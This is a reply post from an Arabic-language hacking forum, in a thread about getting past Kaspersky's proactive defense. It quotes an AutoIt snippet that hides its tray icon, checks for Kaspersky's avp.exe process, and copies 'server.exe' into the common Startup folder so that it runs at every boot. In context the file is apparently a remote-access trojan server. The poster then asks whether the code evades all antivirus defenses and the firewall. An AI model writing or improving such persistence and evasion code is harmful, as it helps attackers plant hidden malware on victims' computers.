عرض مشاركة واحدة
قديم منذ /02-24-2013, 02:56 AM   #8
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة الباتش النّائم مشاهدة المشاركة
mr:hack
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ
كود:
if processexists("avp.exe")
إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ
كود:
filecopy("server.exe",@startupcommondir)
*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:
filecopy("server.exe",@startupcommondir,1)
و الكود ككلّ يصبح

كود:
#notrayicon
opt("trayiconhide", 1)
if processexists("avp.exe") then
    filecopy("server.exe",@startupcommondir)
else
    filecopy("server.exe",@startupcommondir,1)
endif

اخي الكريم


هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟

و

هل يتخطى الفيروال ؟




منتظرك







  رد مع اقتباس
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47